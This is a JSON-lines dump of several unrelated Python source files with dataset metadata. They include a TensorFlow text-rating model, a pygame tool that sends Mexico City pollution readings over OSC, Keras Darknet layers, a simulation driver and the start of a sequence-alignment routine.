input_size, num_classes, scope)\n probabilities = tf.nn.sigmoid(scores,name='probabilities')\n #predictions = self.make_prediction(probabilities,self.threshold)\n return scores, probabilities,W,b\n\n def convert_to_concept_space(self,num_to_convert, input, input_size, scope):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n \"\"\"\n W = tf.get_variable(\n 'W',\n shape=[num_to_convert, input_size, output_size],\n initializer=tf.contrib.layers.xavier_initializer())\n\n concept_vector = tf.einsum('bsij,cjk->bscik', input, W)\n \"\"\"\n W = tf.get_variable(\n 'W',\n shape=[num_to_convert, input_size],\n initializer=tf.contrib.layers.xavier_initializer())\n concept_vector = tf.einsum('bsi,ci->bsci', input, W)\n return concept_vector\n\n def doc_prediction(self,input,input_size,scope):\n\n self.doc_cls_scores,self.doc_cls_probabilities,W,b = self._doc_prediction(input,\n input_size,\n self.num_classes,scope)\n self.l2_loss += tf.nn.l2_loss(W)\n self.l2_loss += tf.nn.l2_loss(b)\n #print(self.doc_cls_scores)\n def add_loss(self):\n if self.use_loss == \"cross-entropy\":\n\n with tf.name_scope('loss'):\n doc_losses = tf.constant(0.0)\n #cls = tf.contrib.layers.one_hot_encoding(self.input_cls,num_classes=self.num_classes)\n doc_losses += tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_cls,logits=self.doc_cls_scores)\n self.doc_losses = tf.reduce_mean(doc_losses)\n\n self.loss = self.doc_losses + self.l2_reg_lambda * self.l2_loss\n\n elif self.use_loss == \"square_error\":\n # Calculate mean absolute error\n with tf.name_scope('loss'):\n #diff = tf.subtract(self.predictions, tf.argmax(self.input_y, 1))\n losses = tf.losses.mean_squared_error(self.input_cls, self.doc_cls_probabilities)\n self.loss = tf.reduce_mean(losses) + self.l2_reg_lambda * self.l2_loss\n def build(self):\n features = []\n doc_features = []\n for i, name in enumerate(self.text_field_names):\n\n input_embedded_words = self.add_embedding_layer(self.input_doc[i])\n\n sentence_input = tf.reshape(input_embedded_words, [-1, self.max_sent_length[name], self.word_embedding_size])\n actual_sent_lengths = tf.reshape(self.doc_actual_sent_lengths[i], [-1])\n sentence_features,sentence_num_features = self.sentence_features(sentence_input,actual_sent_lengths)\n\n\n if self.max_num_sents[name] <= 1:\n #features.append(tf.reshape(sentence_features,[-1,sentence_num_features] ))\n doc_features = tf.reshape(sentence_features,[-1,sentence_num_features])\n\n else:\n sentence_features = tf.reshape(sentence_features, [-1, self.max_num_sents[name], sentence_num_features])\n doc_features= self.doc_features(sentence_features,self.doc_actual_num_sents[i])\n\n if name in self.similarity_text_field_names:\n sentence_features = tf.reshape(sentence_features, [-1, self.max_num_sents[name], sentence_num_features])\n doc_features= self.doc_features(sentence_features,self.doc_actual_num_sents[i])\n\n sentence_concepts = self.convert_to_concept_space(self.num_concepts, sentence_features,\n sentence_num_features,\n \"sentence_concept\")\n doc_concepts = tf.reduce_sum(sentence_concepts, axis=1)\n\n similar_doc_input = self.add_embedding_layer(self.similar_docs[i])\n similar_doc_input = tf.reshape(similar_doc_input,\n [-1, self.max_sent_length[name], self.word_embedding_size])\n similar_doc_actual_sent_lengths = tf.reshape(self.similar_doc_actual_sent_lengths[i], [-1])\n\n similar_doc_sentence_feature, similar_doc_sentence_num_features = self.sentence_features(\n similar_doc_input, similar_doc_actual_sent_lengths)\n # similar_doc_sentence_feature, 
similar_doc_sentence_num_features = tf.reduce_mean(similar_doc_input,axis=1)\n                similar_doc_sentence_feature = tf.reshape(similar_doc_sentence_feature,\n                                                          [-1, self.max_num_sents[name],\n                                                           similar_doc_sentence_num_features])\n\n                similar_doc_actual_num_sents = tf.reshape(self.similar_doc_actual_num_sents[i], [-1])\n                similar_doc_sentence_feature = self.mask_sequence(similar_doc_sentence_feature,\n                                                                  self.max_num_sents[name],\n                                                                  similar_doc_actual_num_sents,\n                                                                  similar_doc_sentence_num_features)\n\n                # similar_doc_sentence_feature = tf.reshape(-1,self.num_simlar_docs,self.max_num_sents,similar_doc_sentence_num_features)\n\n                similar_doc_sentence_concept = self.convert_to_concept_space(self.num_concepts,\n                                                                             similar_doc_sentence_feature,\n                                                                             similar_doc_sentence_num_features,\n                                                                             \"sentence_concept\")\n                similar_doc_sentence_concept = tf.reduce_sum(similar_doc_sentence_concept, axis=1)  # sum all sentence\n\n                similar_doc_concepts = tf.reshape(similar_doc_sentence_concept,\n                                                  [-1, self.num_simlar_docs, self.num_concepts,\n                                                   similar_doc_sentence_num_features])\n                # print('one_similar_doc_concept',similar_doc_concepts.get_shape())\n\n                doc_concepts = tf.reshape(doc_concepts, [-1, 1, self.num_concepts, sentence_num_features])\n                doc_concepts = tf.tile(doc_concepts, [1, self.num_simlar_docs, 1, 1])\n                # similar_doc_similarities =self.cal_similarities(doc_concepts,similar_doc_concepts)\n\n                similar_doc_similarities = tf.reduce_sum(tf.multiply(doc_concepts, similar_doc_concepts), axis=3)\n                print('similar_doc_similarities', similar_doc_similarities.get_shape())\n                average_similar_doc_similarities = tf.reduce_mean(similar_doc_similarities, axis=1)\n\n\n                final_text_field_features = tf.concat([doc_features, average_similar_doc_similarities], axis=-1)\n                features.append(final_text_field_features)\n            else:\n                features.append(doc_features)\n\n        features = tf.concat(features, axis=-1)\n        self.doc_prediction(features, features.get_shape()[-1],'doc_predict')\n\n\n        self.add_loss()\n\n","sub_path":"qualityRating/ordinal_models/model_v4.py","file_name":"model_v4.py","file_ext":"py","file_size_in_byte":14029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"309276302","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nAIRE 2020\n--------------\nSends per-pollutant measurement averages over OSC (/aire/nox 126.12).\nUses historical data from January to April 2020.\n\n.Enable/disable channels\n.Choose a mode per channel: station or average\n.Select the station for each channel\n.plots!\n\n1. change the DATA_PATH and FONT_PATH paths\n2. update OSC_HOST and OSC_PORT\n\"\"\"\n\nimport pygame\nimport json\nimport statistics\nfrom oscpy.client import OSCClient\n\n\npygame.init()\nDATA_PATH = \"contaminantes_2020.JSON\"\nFONT_PATH = \"RevMiniPixel.ttf\"\nN_CONTAMS = 9\nN_ESTACIONES = 28\n\nOSC_HOST = \"127.0.0.1\"\nOSC_PORT = 8000\nOSC_CLIENT = []\n\nW = 850\nH = 500\n\n\ndef pmap(value, inMin, inMax, outMin, outMax):\n    \"\"\" like processing's map \"\"\"\n    inSpan = inMax - inMin\n    outSpan = outMax - outMin\n    try:\n        transVal = float(value - inMin) / float(inSpan)\n        return outMin + (transVal * outSpan)\n    except:\n        return 0\n\n\n# ... .... ... ... ... ... ... ... ... ... ... ... ... ... ... ... 
...\nclass Plot():\n def __init__(self, x, y):\n # create and update pixel-style plots\n self.pos = [] #position\n self.sz = [] #size\n self.color = (0,255,0) #color\n self.samples = [] #data\n self.samples_mean = []\n self.a = 00 #actual sample\n self.b = 00 #actual mean\n self.n = 96 #number of samples\n self.esta = \"[-]\"\n # init pos and data\n self.pos = [x,y]\n self.samples = [0.0 for a in range(self.n)]\n self.samples_mean = [0.0 for a in range(self.n)]\n self.font = pygame.font.Font(FONT_PATH, 14)\n\n return\n\n def update(self, new_sample, new_mean, nam):\n # queue new sample and dequeue other data\n self.a = new_sample\n self.samples.append(self.a)\n old = self.samples.pop(0)\n self.b = new_mean\n self.samples_mean.append(self.b)\n old_mean = self.samples_mean.pop(0)\n self.esta = nam\n return\n\n def draw(self, surf, dx, dy):\n # draw the list or create a polygon\n wi = 50\n he = 96*2\n val_max = max(self.samples)\n val_min = min(self.samples)\n mean_max = max(self.samples_mean)\n mean_min = min(self.samples_mean)\n points = [[dx+pmap(s, val_min, val_max, 0, wi), dy+i*2] for i,s in enumerate(self.samples)]\n points_mean = [[dx+pmap(s, mean_min, mean_max, 0, wi), dy+i*2] for i,s in enumerate(self.samples_mean)]\n last_sample = self.samples[-1]\n last_sample_mean = self.samples_mean[-1]\n actual_point = points[-1]\n actual_point_mean = points_mean[-1]\n points = [[dx,dy]] + points + [[dx,dy+(len(self.samples)-1)*2]]\n points_mean = [[dx,dy]] + points_mean + [[dx,dy+(len(self.samples)-1)*2]]\n pygame.draw.polygon(surf, (0,64,0), points_mean, 1)\n pygame.draw.polygon(surf, GREEN, points, 1)\n pygame.draw.rect(surf, (0,64,0), pygame.Rect(dx,dy,wi,he), 1)\n pygame.draw.line(surf, GREEN, (actual_point[0],actual_point[1]-2),(actual_point[0],actual_point[1]+2), 2)\n pygame.draw.line(surf, (0,64,0), (actual_point_mean[0],actual_point_mean[1]-2),(actual_point_mean[0],actual_point_mean[1]+2), 2)\n\n pygame.draw.line(surf, (0,127,0), (dx,dy+he+29),(dx+50,dy+he+29), 1)\n pygame.draw.line(surf, (0,255,0), (actual_point[0],actual_point[1]+25),(actual_point[0],actual_point[1]+29), 2)\n pygame.draw.line(surf, (0,64,0), (actual_point_mean[0],actual_point_mean[1]+33),(actual_point_mean[0],actual_point_mean[1]+36), 2)\n le_color_mean = pygame.Color(int(pmap(last_sample_mean, mean_min, mean_max, 0, 255)),\n int(pmap(last_sample_mean, mean_min, mean_max, 255,0)),\n int(pmap(last_sample_mean, mean_min, mean_max, 255,120)))\n val = self.font.render('W: {:0.2f}'.format(last_sample), 1, GREEN)\n val_mean = self.font.render('M: {:0.2f}'.format(last_sample_mean), 1, (0,127,0))\n surf.blit(val, (dx, 98*2+105))\n surf.blit(val_mean, (dx, 98*2+134))\n n_estacion = self.font.render('< {} >'.format(self.esta), 1, GREEN)\n surf.blit(n_estacion, (dx, dy-20))\n return\n# ... .... ... ... ... ... ... ... ... ... ... ... ... ... ... ... 
...\n\n\n\n\nestaciones = [\n {\"sig\":\"AJM\", \"nombre\":\"Ajusco Medio\", \"id\":\"242\"},\n {\"sig\":\"ATI\", \"nombre\":\"Atizapán\", \"id\":\"243\"},\n {\"sig\":\"BJU\", \"nombre\":\"Benito Juárez\", \"id\":\"300\"},\n {\"sig\":\"CAM\", \"nombre\":\"Camarones\", \"id\":\"244\"},\n {\"sig\":\"CCA\", \"nombre\":\"Centro de Ciencias de la Atmósfera\", \"id\":\"245\"},\n {\"sig\":\"CHO\", \"nombre\":\"Chalco\", \"id\":\"246\"},\n {\"sig\":\"CUA\", \"nombre\":\"Cuajimalpa\", \"id\":\"248\"},\n {\"sig\":\"CUT\", \"nombre\":\"Cuautitlán\", \"id\":\"249\"},\n {\"sig\":\"FAC\", \"nombre\":\"FES Acatlán\", \"id\":\"250\"},\n {\"sig\":\"FAR\", \"nombre\":\"FES Aragón\", \"id\":\"431\"},\n {\"sig\":\"GAM\", \"nombre\":\"Gustavo A. Madero\", \"id\":\"302\"},\n {\"sig\":\"HGM\", \"nombre\":\"Hospital General de México\", \"id\":\"251\"},\n {\"sig\":\"IZT\", \"nombre\":\"Iztacalco\", \"id\":\"252\"},\n {\"sig\":\"LPR\", \"nombre\":\"La Presa\", \"id\":\"253\"},\n {\"sig\":\"LLA\", \"nombre\":\"Los Laureles\", \"id\":\"254\"},\n {\"sig\":\"MER\", \"nombre\":\"Merced\", \"id\":\"256\"},\n {\"sig\":\"MGH\", \"nombre\":\"Miguel Hidalgo\", \"id\":\"263\"},\n {\"sig\":\"NEZ\", \"nombre\":\"Nezahuacóyotl\", \"id\":\"258\"},\n {\"sig\":\"PED\", \"nombre\":\"Pedregal\", \"id\":\"259\"},\n {\"sig\":\"SAG\", \"nombre\":\"San Agustín\", \"id\":\"260\"},\n {\"sig\":\"SFE\", \"nombre\":\"Santa Fé\", \"id\":\"262\"},\n {\"sig\":\"SAC\", \"nombre\":\"Santiago Acahualtepec\", \"id\":\"432\"},\n {\"sig\":\"TAH\", \"nombre\":\"Tlahuac\", \"id\":\"265\"},\n {\"sig\":\"TLA\", \"nombre\":\"Tlalnepantla\", \"id\":\"266\"},\n {\"sig\":\"TLI\", \"nombre\":\"Tultitlán\", \"id\":\"267\"},\n {\"sig\":\"UIZ\", \"nombre\":\"UAM Iztapalapa\", \"id\":\"268\"},\n {\"sig\":\"UAX\", \"nombre\":\"UAM Xochimilco\", \"id\":\"269\"},\n {\"sig\":\"VIF\", \"nombre\":\"Villa de las Flores\", \"id\":\"270\"},\n {\"sig\":\"XAL\", \"nombre\":\"Xalostoc\", \"id\":\"271\"}\n ]\n\n\n\n# init\nWINDOW = pygame.display.set_mode((W, H))\n\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\nWHITE = (255, 255, 255)\nBLACK = (0,0,0)\nORANGE = (255,1,120)\nBACKGROUND_COLOR = (0,0,63)\n\n# load stuff, like fonts\nFONT = pygame.font.Font(FONT_PATH, 16)\nFONTmini = pygame.font.Font(FONT_PATH, 14)\n\n# main screen for drawing buttons\nDRAW_SCREEN = pygame.Surface((W,H))\nDRAW_SCREEN.fill(BACKGROUND_COLOR)\nPLOT_SCREEN = pygame.Surface((W,H))\n\n# buttons\nCONTAMS = ['CO','NO','NO2','NOX','O3','PM10','SO2','PM2','PMCO']\nLABELS = [FONT.render(cs, 1, (0, 255, 0)) for cs in CONTAMS]\nBTNS_SWS = [pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(100+c*75, 350, 50, 50), 2) for c in range(N_CONTAMS)]\nBTNS_MODES = [pygame.draw.rect(PLOT_SCREEN, RED, pygame.Rect(100+c*75, 300, 50, 50), 1) for c in range(N_CONTAMS)]\nBTNS_STATS_L = [pygame.draw.rect(PLOT_SCREEN, BLUE, pygame.Rect(100+c*75, 50, 25, 50), 1) for c in range(N_CONTAMS)]\nBTNS_STATS_R = [pygame.draw.rect(PLOT_SCREEN, BLUE, pygame.Rect(100+c*75+25, 50, 25, 50), 1) for c in range(N_CONTAMS)]\n\n\n# timer events\nTIC_EVENT = pygame.USEREVENT + 1\nTIC_TIMER = 1000\n\n#states and counters\nclock = pygame.time.Clock()\n\nsws = [False for c in range(N_CONTAMS)]\nstats = [c for c in range(N_CONTAMS)]\nmodes = [1 if (c < 5) else 0 for c in range(N_CONTAMS)] # mode 0 is mean, 1 is station\n\nactual_set = [0,0,0,0,0,0,0,0,0,\"\"]\nactual_set_means = [0,0,0,0,0,0,0,0,0,\"\"]\nbuffers = []\npos = (0,0)\nrunning = True\nii=0\nindex_estacion = 2\nesta = \"[*]\"\n\ncontaminantes = {}\nfechas = []\ncurrent_means 
= []\n\nPLOTS = [Plot(100+i*75, 200) for i in range(N_CONTAMS)]\n\n\n# -osc\ndef init_osc(osc_host = OSC_HOST, osc_port = OSC_PORT):\n    global OSC_CLIENT\n    OSC_CLIENT = OSCClient(osc_host, osc_port)\n    return\ndef update_data_send(i=0):\n    global contaminantes, fechas, OSC_CLIENT, actual_set, actual_set_means\n    print("\\n\\n[timetag]: ", fechas[i])\n    pack = contaminantes['pollutionMeasurements']['date'][fechas[i]]\n    substances = list(pack.keys())\n    actual_set = [0,0,0,0,0,0,0,0,0,fechas[i]]\n    actual_set_means = [0,0,0,0,0,0,0,0,0,fechas[i]]\n    # -send\n    for j,s in enumerate(substances):\n        estado_estaciones = pack[s]\n        lista_mediciones = [float(estado_estaciones[e]) for e in estado_estaciones.keys() if isFloat(estado_estaciones[e])]\n        if (s == "PM2.5"): s = "PM2"\n        # get the mean\n        try:\n            aux_mean = statistics.mean(lista_mediciones)\n            actual_set_means[j] = aux_mean\n        except:\n            aux_mean = 0\n            actual_set_means[j] = 0\n        # get the simple data\n        e=""\n        esta="---"\n        try:\n            e = estaciones[stats[j]]["sig"]\n            if (modes[j]): esta = e\n            #print (estado_estaciones[e])\n            if isFloat(estado_estaciones[e]):\n                aux_sam = float(estado_estaciones[e])\n            else:\n                aux_sam = 0\n            actual_set[j] = aux_sam\n        except:\n            aux_sam = 0\n            actual_set[j] = aux_sam\n\n        # send\n        if sws[j]:\n            ruta = '/aire/{}'.format(s.lower())\n            ruta = ruta.encode()\n            if (modes[j]):\n                OSC_CLIENT.send_message(ruta, [aux_sam])\n                print("{} \\t{:0.3f}\\t({})".format(s, aux_sam, e))\n            else:\n                OSC_CLIENT.send_message(ruta, [aux_mean])\n                print("{} \\t{:0.3f}\\t({:d})".format(s, aux_mean, len(lista_mediciones)))\n        # append data to set\n        PLOTS[j].update(aux_sam, aux_mean, esta)\n        #if (j==0): plot_one.update(aux_sam, aux_mean, esta)\n    return\n\n# -data stuff\ndef load_data():\n    global contaminantes,fechas\n    # to access the data in the file:\n    contaminantes = json.load(open(DATA_PATH,'r+'))\n    _dates = contaminantes['pollutionMeasurements']['date'].keys()\n    fechas = list(_dates)\n    print ("[DATA]: ok")\n    return\n\ndef isFloat(s):\n    try:\n        float(s)\n        return True\n    except ValueError:\n        return False\n\n\n\n# tic for the timer\ndef tic():\n    global ii\n    update_data_send(ii)\n    ii = ii+1\n    #print ("\\t\\t --> DATA IS SENT here")\n    return\n\n# handle keys ;D;D\ndef handle_keys(event):\n    global running, stats\n    """if (event.key == pygame.K_DOWN):\n        running = False\n    if (event.key == pygame.K_LEFT):\n        if(stats[0]>0): stats[0]=stats[0]-1\n    if (event.key == pygame.K_RIGHT):\n        if(stats[0]<20): stats[0]=stats[0]+1"""\n\ndef exit_():\n    global running\n    running=False\n    return\n\n# handle events with a dictionary\ndef handle_events():\n    event_dict = {\n        pygame.QUIT: exit_,\n        pygame.KEYDOWN: handle_keys,\n        TIC_EVENT: tic\n    }\n    for event in pygame.event.get():\n        if event.type in event_dict:\n            if (event.type==pygame.KEYDOWN):\n                event_dict[event.type](event)\n            else:\n                event_dict[event.type]()\n    return\n\n# handle mouse clicks\ndef handle_mouse_clicks():\n    global sws, stats, modes\n    # check for mouse pos and click\n    pos = pygame.mouse.get_pos()\n    pressed1, pressed2, pressed3 = pygame.mouse.get_pressed()\n    # Check collision between buttons (switches) and mouse1\n    for j,b in enumerate(BTNS_SWS):\n        if (b.collidepoint(pos) and pressed1):\n            sws[j] = not (sws[j])\n            #if (sws[j]==True):\n            #    conts[j] = conts[j]+1\n            print("[B{}]!: ".format(j), sws[j])\n    # Check collision between buttons (modes) and mouse1\n    for j,b in enumerate(BTNS_MODES):\n        if (b.collidepoint(pos) and pressed1):\n            modes[j] = int(not modes[j])\n            print("[M{}]!: ".format(j), 
modes[j])\n # Check collision between buttons (conts_l) and mouse1\n for j,b in enumerate(BTNS_STATS_L):\n if (b.collidepoint(pos) and pressed1):\n if (stats[j] > 0):\n stats[j] = stats[j] - 1\n print(\"[E{}]!: \".format(j), stats[j])\n # Check collision between buttons (conts_l) and mouse1\n for j,b in enumerate(BTNS_STATS_R):\n if (b.collidepoint(pos) and pressed1):\n if (stats[j] < N_ESTACIONES):\n stats[j] = stats[j] + 1\n print(\"[E{}]!: \".format(j), stats[j])\n return\n\n\ndef update_graphics():\n #updaye plots and other gui\n PLOT_SCREEN.fill((0,0,0,255))\n #plot_one.draw(PLOT_SCREEN, 100, 100)\n #BTNS_SWS = [pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(100+c*75, 350, 50, 50), 2) for c in range(N_CONTAMS)]\n for c in range(N_CONTAMS):\n # do plots\n o_x = 100+c*75\n PLOTS[c].draw(PLOT_SCREEN, o_x, 100)\n # redo btns\n if(sws[c]): pygame.draw.rect(PLOT_SCREEN, GREEN, pygame.Rect(o_x, 350, 50, 50), 2)\n else: pygame.draw.rect(PLOT_SCREEN, (16,127,8), pygame.Rect(o_x, 350, 50, 50), 2)\n # blit on WINDOW\n WINDOW.blit(PLOT_SCREEN, (0, 0))\n pygame.display.flip()\n return\n\n# update labels and other text in display\ndef update_text():\n global LABELS, actual_set, actual_set_means\n # blit on WINDOW\n #WINDOW.blit(DRAW_SCREEN, (0, 0))\n AUX_LABEL = FONT.render('-> i n t e r s p e c i f i c s : ', 1, (32, 48, 0))\n WINDOW.blit(AUX_LABEL, (100, 30))\n AUX_LABEL = FONT.render(' [ AIRE ]', 1, GREEN)\n WINDOW.blit(AUX_LABEL, (390, 30))\n for j in range(N_CONTAMS):\n if sws[j]: LAB = FONT.render(CONTAMS[j], 1, (0, 255, 0))\n else: LAB = FONT.render(CONTAMS[j], 1, (32, 24, 0))\n #WINDOW.blit(LABELS[j], (104+j*75, 354))\n if modes[j]: STA = FONTmini.render(\"{:0.2f}\".format(actual_set[j]), 1, (0, 255, 0))\n else: STA = FONTmini.render(\"{:0.2f}\".format(actual_set_means[j]), 1, (0,127,0))\n WINDOW.blit(LAB, (104+j*75, 354))\n WINDOW.blit(STA, (104+j*75, 384))\n # sign >\n SIG_LABEL = FONTmini.render(\">\", 1, (192,255,0))\n WINDOW.blit(SIG_LABEL, (92+j*75, 330-modes[j]*30))\n CUNT_LABEL = FONT.render(\"[step]: {}\".format(ii), 1, (16,64,32))\n WINDOW.blit(CUNT_LABEL, (450, 450))\n CUNT_LABEL = FONT.render(\"[timetag]: \"+actual_set_means[-1], 1, (16,64,32))\n WINDOW.blit(CUNT_LABEL, (100, 450))\n CUNT_LABEL = FONT.render(\"STAT:MMXX:\", 1, (32,48,0))\n WINDOW.blit(CUNT_LABEL, (650, 450))\n pygame.display.flip()\n return\n\n\n\n\n# the loop from outside\ndef game_loop():\n while running:\n handle_events()\n handle_mouse_clicks()\n update_graphics()\n update_text()\n clock.tick(9)\n\n# the main (init+loop)\ndef main():\n pygame.display.set_caption(' . 
A i R E .')\n init_osc()\n load_data()\n pygame.time.set_timer(TIC_EVENT, TIC_TIMER)\n game_loop()\n print(\"FIN DE LA TRANSMISSION //...\")\n\nif __name__==\"__main__\":\n main()\n","sub_path":"python/aire_stat.py","file_name":"aire_stat.py","file_ext":"py","file_size_in_byte":14680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525489451","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, LeakyReLU, ZeroPadding2D, Concatenate\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras import Model\n\n\nclass DarknetConv2DBNLeaky(tf.keras.layers.Layer):\n \"\"\"Convolutional layer with batch normaltion and leaky relu\"\"\"\n\n def __init__(self, filters, k_size, strides=None, padding=None):\n super(DarknetConv2DBNLeaky, self).__init__()\n self.conv_1 = Conv2D(filters=filters,\n kernel_size=k_size,\n kernel_regularizer=l2(5e-4),\n padding=padding if padding is not None else 'same',\n strides=strides if strides is not None else (1, 1))\n self.batch_normalization_1 = BatchNormalization()\n self.leaky_relu_1 = LeakyReLU(alpha=0.1)\n\n def call(self, *args):\n x = self.conv_1(args)\n x = self.batch_normalization_1(x)\n return self.leaky_relu_1(x)\n\n\nclass DownSampling(tf.keras.layers.Layer):\n \"\"\"Downsample using zeropadding((1, 0), (1, 0)) and a conv with strides 2\"\"\"\n\n def __init__(self, filters):\n super(DownSampling, self).__init__()\n self.conv_2 = DarknetConv2DBNLeaky(filters=filters,\n k_size=(3, 3),\n strides=(2, 2),\n padding='valid')\n self.zeropadding_1 = ZeroPadding2D(((1, 0), (1, 0)))\n\n def call(self, *args):\n x = self.zeropadding_1(*args)\n return self.conv_2(x)\n\n\nclass CSPRblock(tf.keras.layers.Layer):\n \"\"\"Create an identity block for CSPRDarknet\"\"\"\n\n def __init__(self, filters, num_block):\n super(CSPRblock, self).__init__()\n self.conv_3 = DarknetConv2DBNLeaky(filters=filters, k_size=(3, 3))\n self.downsample_1 = DownSampling(filters)\n self.concat_1 = Concatenate(axis=0)\n self.splitter = lambda x: tf.split(x, num_or_size_splits=2, axis=0)\n self.num_block = num_block\n\n def call(self, *args):\n x = self.downsample_1(*args)\n x1, x2 = self.splitter(x)\n for block in range(self.num_block):\n x = self.conv_3(x1)\n x1 += x\n return self.concat_1([x1, x2])\n\n\nclass Darknet53(tf.keras.layers.Layer):\n \"\"\"All of the CSPRDarknet_53 but the last layer\"\"\"\n\n def __init__(self):\n super(Darknet53, self).__init__()\n self.conv_4 = DarknetConv2DBNLeaky(32, (3, 3))\n self.block = dict()\n self.block[0] = CSPRblock(64, 1)\n self.block[1] = CSPRblock(128, 2)\n self.block[2] = CSPRblock(256, 8)\n self.block[3] = CSPRblock(512, 8)\n self.block[4] = CSPRblock(1024, 4)\n\n # def call(self, *args):\n # y = []\n # x = self.conv_4(*args)\n # for i in range(len(self.block)):\n # x = self.block[i](x)\n # y.append(x)\n # y = y[-3:]\n # return y[::-1]\n\n def call(self, *args):\n x = self.conv_4(*args)\n x = self.block[0](x)\n x = self.block[1](x)\n y1 = self.block[2](x)\n y2 = self.block[3](y1)\n y3 = self.block[4](y2)\n return [y3, y2, y1]\n\n\nclass PredictionLayer(tf.keras.layers.Layer):\n \"\"\"Layer that make the predictions\"\"\"\n\n def __init__(self, filters, num_classes):\n super(PredictionLayer, self).__init__()\n self.conv_5 = Conv2D(filters=num_classes * (num_classes + 5),\n kernel_size=(3, 3),\n kernel_regularizer=l2(5e-4),\n padding='same')\n self.conv_6 = DarknetConv2DBNLeaky(filters * 2, (3, 3))\n self.conv_7 = 
DarknetConv2DBNLeaky(filters, (1, 1))\n\n def call(self, *args):\n x = self.conv_7(*args) # (1, 1)\n x = self.conv_6(x) # (3, 3)\n x = self.conv_7(x) # (1, 1)\n x = self.conv_6(x) # (3, 3)\n x = self.conv_7(x) # (1, 1)\n\n y = self.conv_6(x) # (3, 3)\n y = self.conv_5(y)\n\n return x, y\n\n\n","sub_path":"Archive/Darknet_53_v2.py","file_name":"Darknet_53_v2.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"507206099","text":"## Author : Ragavi Swarnalatha Raman (rraman2) - 200203611 ##\n#!/usr/bin/python\nimport sys\nimport random\n#sys.path.append(\"./task1/\")\nfrom handsimulation import Simulation\n\nargs = sys.argv\nif len(args) != 7:\n\tprint(\"Usage: driver.py \")\n\texit(1)\t\n\n## inputs and defaults\nmc = 0\nbuffer = 0\ncla = 2\ncls = 0\nclr = []\n\nmax_mc = int(args[5]) ## maximum Master Clock Value\nsimulation_table = []\n\n## arrival,completion and orbiting times\nCLA = float(args[1])\nCLS = int(args[3])\nCLR = float(args[2])\nb_size = int(args[4])\nseed = int(args[6])\nrandom.seed(seed)\n\ni=0\nfd = open(\"./output.txt\",'w+')\n\nsimul_obj = Simulation(mc,cla,buffer,cls,clr) ## Calling Simulation\nsimulation_table.append(['MC', 'CLA', 'Buffer', 'CLS', 'CLR'])\nsimulation_table.append([str(mc),str(cla),str(buffer),str(cls),str(clr)])\nwhile i <= max_mc:\n\tmc,cla,buffer,cls,clr = simul_obj.simulation(CLA,CLS,CLR,b_size,fd,seed)\n\tsimulation_table.append([str(mc),str(cla),str(buffer),str(cls),str(clr)])\n\ti = mc\n\nfd.write(\"Consolidated Simulation Output Table\"+'\\n\\n\\n')\nfor item in simulation_table:\n#\tprint(\" \t\".join(item))\n\tfd.write(\"\t\t \".join(item)+\"\\n\")\n\nprint(\"Generating Output in output.txt. Do 'cat output.txt'\")\nfd.close()\n \n","sub_path":"rraman2_task2/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81109936","text":"\n\nfrom xai.brain.wordbase.adjectives._dicky import _DICKY\n\n#calss header\nclass _DICKIES(_DICKY, ):\n\tdef __init__(self,): \n\t\t_DICKY.__init__(self)\n\t\tself.name = \"DICKIES\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"dicky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_dickies.py","file_name":"_dickies.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269388294","text":"MIN = -float(\"inf\")\r\n\r\ndef init_matrix(nrow, ncol, gape_open, gape_ext):\r\n M = [[MIN] * ncol for i in range(nrow)]\r\n Ix = [[MIN] * ncol for i in range(nrow)]\r\n Iy = [[MIN] * ncol for i in range(nrow)]\r\n \r\n M[0][0] = 0 \r\n Ix[0][0] = Iy[0][0] = MIN\r\n for i in range(1, nrow):\r\n M[i][0] = MIN\r\n Ix[i][0] = gape_open + (i - 1) * gape_ext\r\n Iy[i][0] = MIN\r\n for j in range(1, ncol):\r\n M[0][j] = MIN\r\n Ix[0][j] = MIN\r\n Iy[0][j] = gape_open + (j - 1) * gape_ext\r\n\r\n return M, Ix, Iy\r\n\r\ndef distance_matrix(P, Q, M, Ix, Iy, gape_open, gape_ext, A, R):\r\n nrow = len(Q) + 1\r\n ncol = len(P) + 1\r\n \r\n for i in range(1, nrow):\r\n for j in range(1, ncol):\r\n match = R[A.index(Q[i-1])][A.index(P[j-1])]\r\n Ix[i][j] = max((M[i-1][j] + gape_open),\\\r\n (Ix[i-1][j] + gape_ext),\\\r\n (Iy[i-1][j] + gape_open),)\r\n Iy[i][j] = max((M[i][j-1] + gape_open),\\\r\n (Ix[i][j-1] + gape_open),\\\r\n (Iy[i][j-1] + gape_ext))\r\n M[i][j] = max((M[i-1][j-1] + match),\\\r\n 
